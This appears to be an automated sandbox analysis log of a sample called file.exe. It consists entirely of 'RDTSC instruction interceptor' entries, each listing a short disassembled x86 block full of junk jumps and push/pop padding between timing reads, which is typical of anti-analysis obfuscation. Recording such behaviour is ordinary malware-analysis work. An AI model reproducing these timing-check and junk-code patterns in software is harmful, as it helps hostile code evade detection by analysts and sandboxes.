Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55403D0 second address: 55404E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F99D0DE6F2Eh 0x0000000f push eax 0x00000010 jmp 00007F99D0DE6F2Bh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 mov dx, ax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F99D0DE6F2Eh 0x00000021 sbb si, 9528h 0x00000026 jmp 00007F99D0DE6F2Bh 0x0000002b popfd 0x0000002c call 00007F99D0DE6F38h 0x00000031 pop eax 0x00000032 popad 0x00000033 popad 0x00000034 mov ebp, esp 0x00000036 pushad 0x00000037 jmp 00007F99D0DE6F37h 0x0000003c mov edi, ecx 0x0000003e popad 0x0000003f mov eax, dword ptr [ebp+08h] 0x00000042 jmp 00007F99D0DE6F32h 0x00000047 and dword ptr [eax], 00000000h 0x0000004a pushad 0x0000004b jmp 00007F99D0DE6F2Eh 0x00000050 movzx ecx, bx 0x00000053 popad 0x00000054 and dword ptr [eax+04h], 00000000h 0x00000058 pushad 0x00000059 pushfd 0x0000005a jmp 00007F99D0DE6F33h 0x0000005f xor eax, 0EF3C68Eh 0x00000065 jmp 00007F99D0DE6F39h 0x0000006a popfd 0x0000006b mov esi, 0DCB7597h 0x00000070 popad 0x00000071 pop ebp 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007F99D0DE6F39h 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55404E4 second address: 55404F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99D0D12E1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520460 second address: 5520464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520464 second address: 5520477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520477 second address: 552048F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99D0DE6F34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 552048F second address: 55204B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F99D0D12E24h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55204B0 second address: 55204EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 47B4h 0x00000007 push edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 mov dl, 3Eh 0x00000012 pushfd 0x00000013 jmp 00007F99D0DE6F2Eh 0x00000018 adc ecx, 55F2A568h 0x0000001e jmp 00007F99D0DE6F2Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55204EC second address: 5520507 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520507 second address: 552051F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99D0DE6F34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530F30 second address: 5530F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530F34 second address: 5530FAB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F99D0DE6F30h 0x00000008 adc ax, 1118h 0x0000000d jmp 00007F99D0DE6F2Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F99D0DE6F38h 0x0000001b sbb cx, FB78h 0x00000020 jmp 00007F99D0DE6F2Bh 0x00000025 popfd 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a mov ax, DACBh 0x0000002e mov ebx, eax 0x00000030 popad 0x00000031 pop ebp 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F99D0DE6F39h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 556073F second address: 5560745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560745 second address: 5560749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560749 second address: 556076C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F99D0D12E26h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 556076C second address: 5560772 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560772 second address: 55607CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c pushad 0x0000000d mov edi, esi 0x0000000f pushfd 0x00000010 jmp 00007F99D0D12E1Ah 0x00000015 sbb eax, 79F146A8h 0x0000001b jmp 00007F99D0D12E1Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov eax, dword ptr [774365FCh] 0x00000027 jmp 00007F99D0D12E26h 0x0000002c test eax, eax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 movsx edx, ax 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55607CD second address: 55607D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55607D2 second address: 5560819 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F9A42B65F91h 0x0000000f pushad 0x00000010 movzx ecx, di 0x00000013 call 00007F99D0D12E29h 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b popad 0x0000001c mov ecx, eax 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 mov ecx, edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560819 second address: 5560844 instructions: 0x00000000 rdtsc 0x00000002 mov dl, 98h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cl, CAh 0x00000008 popad 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c jmp 00007F99D0DE6F36h 0x00000011 and ecx, 1Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560844 second address: 556084A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 556084A second address: 5560850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560904 second address: 556094F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 17B2h 0x00000007 mov al, bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F99D0D12E20h 0x00000014 and eax, 2BD280C8h 0x0000001a jmp 00007F99D0D12E1Bh 0x0000001f popfd 0x00000020 mov ax, 663Fh 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F99D0D12E21h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 556094F second address: 5560954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560954 second address: 556098E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F99D0D12E1Dh 0x0000000a add al, FFFFFF96h 0x0000000d jmp 00007F99D0D12E21h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F99D0D12E1Dh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 556098E second address: 55609C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99D0DE6F37h 0x00000009 xor cl, 0000007Eh 0x0000000c jmp 00007F99D0DE6F39h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 551002F second address: 5510047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99D0D12E24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5510047 second address: 551004B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 551004B second address: 551005A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c movzx esi, dx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 551005A second address: 55100D4 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 38830BE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, 1170FE94h 0x0000000e popad 0x0000000f mov dword ptr [esp], ebp 0x00000012 jmp 00007F99D0DE6F33h 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a movzx ecx, di 0x0000001d mov bh, 56h 0x0000001f popad 0x00000020 and esp, FFFFFFF8h 0x00000023 pushad 0x00000024 push ecx 0x00000025 call 00007F99D0DE6F35h 0x0000002a pop esi 0x0000002b pop ebx 0x0000002c mov eax, 00695EFDh 0x00000031 popad 0x00000032 xchg eax, ecx 0x00000033 jmp 00007F99D0DE6F38h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F99D0DE6F2Eh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55100D4 second address: 55100E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99D0D12E1Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55100E6 second address: 55100EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5510224 second address: 551028A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99D0D12E27h 0x00000009 xor si, 3C5Eh 0x0000000e jmp 00007F99D0D12E29h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, edi 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F99D0D12E1Ah 0x00000021 jmp 00007F99D0D12E25h 0x00000026 popfd 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 551028A second address: 551028E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 551028E second address: 55102BF instructions: 0x00000000 rdtsc 0x00000002 call 00007F99D0D12E1Ch 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b test esi, esi 0x0000000d jmp 00007F99D0D12E21h 0x00000012 je 00007F9A42BB1178h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55102BF second address: 55102C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55102C5 second address: 55102CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55102CB second address: 55102CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55102CF second address: 5510384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f jmp 00007F99D0D12E28h 0x00000014 je 00007F9A42BB114Bh 0x0000001a jmp 00007F99D0D12E20h 0x0000001f mov edx, dword ptr [esi+44h] 0x00000022 jmp 00007F99D0D12E20h 0x00000027 or edx, dword ptr [ebp+0Ch] 0x0000002a pushad 0x0000002b jmp 00007F99D0D12E1Eh 0x00000030 pushfd 0x00000031 jmp 00007F99D0D12E22h 0x00000036 sbb esi, 7C283438h 0x0000003c jmp 00007F99D0D12E1Bh 0x00000041 popfd 0x00000042 popad 0x00000043 test edx, 61000000h 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c pushfd 0x0000004d jmp 00007F99D0D12E22h 0x00000052 adc cx, 2E98h 0x00000057 jmp 00007F99D0D12E1Bh 0x0000005c popfd 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5510384 second address: 55103A1 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov cx, dx 0x0000000a popad 0x0000000b jne 00007F9A42C8521Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F99D0DE6F2Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55103A1 second address: 55103D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d jmp 00007F99D0D12E26h 0x00000012 jne 00007F9A42BB10EDh 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55103D6 second address: 55103DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55103DC second address: 5510413 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99D0D12E22h 0x00000009 sub ah, FFFFFFB8h 0x0000000c jmp 00007F99D0D12E1Bh 0x00000011 popfd 0x00000012 mov dl, ah 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test bl, 00000007h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov si, 3383h 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5510413 second address: 5510419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500830 second address: 5500845 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500845 second address: 5500875 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov bx, 946Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e pushad 0x0000000f mov si, A907h 0x00000013 mov edx, ecx 0x00000015 popad 0x00000016 mov dword ptr [esp], ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F99D0DE6F35h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500875 second address: 55008BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov cx, EA73h 0x00000010 mov ah, BAh 0x00000012 popad 0x00000013 and esp, FFFFFFF8h 0x00000016 jmp 00007F99D0D12E1Bh 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F99D0D12E25h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55008BA second address: 55008C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55008C0 second address: 550094B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F99D0D12E24h 0x00000010 adc ecx, 7F2A8708h 0x00000016 jmp 00007F99D0D12E1Bh 0x0000001b popfd 0x0000001c mov dl, ah 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 jmp 00007F99D0D12E1Bh 0x00000025 xchg eax, esi 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F99D0D12E24h 0x0000002d and ch, FFFFFF98h 0x00000030 jmp 00007F99D0D12E1Bh 0x00000035 popfd 0x00000036 popad 0x00000037 push eax 0x00000038 jmp 00007F99D0D12E24h 0x0000003d xchg eax, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F99D0D12E1Ah 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 550094B second address: 550094F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 550094F second address: 5500955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500955 second address: 5500985 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 movzx ecx, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e jmp 00007F99D0DE6F2Bh 0x00000013 sub ebx, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F99D0DE6F31h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500985 second address: 550098B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 550098B second address: 55009A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 mov ebx, 439227DAh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test esi, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55009A0 second address: 55009A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, 2ADFh 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55009A9 second address: 55009E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 4EA28656h 0x00000008 jmp 00007F99D0DE6F37h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007F9A42C8C8E9h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F99D0DE6F30h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55009E5 second address: 55009EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55009EB second address: 5500A41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007F99D0DE6F30h 0x00000015 mov ecx, esi 0x00000017 pushad 0x00000018 mov cl, CAh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007F99D0DE6F39h 0x00000022 jmp 00007F99D0DE6F2Bh 0x00000027 popfd 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500A41 second address: 5500AC3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F99D0D12E28h 0x00000008 xor ecx, 2D7DCEC8h 0x0000000e jmp 00007F99D0D12E1Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 je 00007F9A42BB8748h 0x0000001d pushad 0x0000001e jmp 00007F99D0D12E24h 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F99D0D12E20h 0x0000002a jmp 00007F99D0D12E25h 0x0000002f popfd 0x00000030 popad 0x00000031 popad 0x00000032 test byte ptr [77436968h], 00000002h 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500AC3 second address: 5500AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500AC7 second address: 5500ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500ACB second address: 5500AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500AD1 second address: 5500AED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99D0D12E27h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500AED second address: 5500B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jne 00007F9A42C8C7E8h 0x0000000d pushad 0x0000000e mov dl, cl 0x00000010 mov dx, ACE2h 0x00000014 popad 0x00000015 mov edx, dword ptr [ebp+0Ch] 0x00000018 pushad 0x00000019 mov edi, 0DD8F63Ah 0x0000001e call 00007F99D0DE6F2Bh 0x00000023 pop edi 0x00000024 popad 0x00000025 xchg eax, ebx 0x00000026 jmp 00007F99D0DE6F32h 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F99D0DE6F2Dh 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500B3D second address: 5500B43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500B43 second address: 5500BB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F99D0DE6F30h 0x0000000f xchg eax, ebx 0x00000010 jmp 00007F99D0DE6F30h 0x00000015 push eax 0x00000016 jmp 00007F99D0DE6F2Bh 0x0000001b xchg eax, ebx 0x0000001c jmp 00007F99D0DE6F36h 0x00000021 push dword ptr [ebp+14h] 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F99D0DE6F37h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500C1C second address: 5500C20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500C20 second address: 5500C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500C26 second address: 5500C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500C2C second address: 5500C3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500C3A second address: 5500C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500C41 second address: 5500CA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99D0DE6F36h 0x00000009 or eax, 7B4C0DA8h 0x0000000f jmp 00007F99D0DE6F2Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F99D0DE6F38h 0x0000001b jmp 00007F99D0DE6F35h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov esp, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov ecx, ebx 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e rdtsc
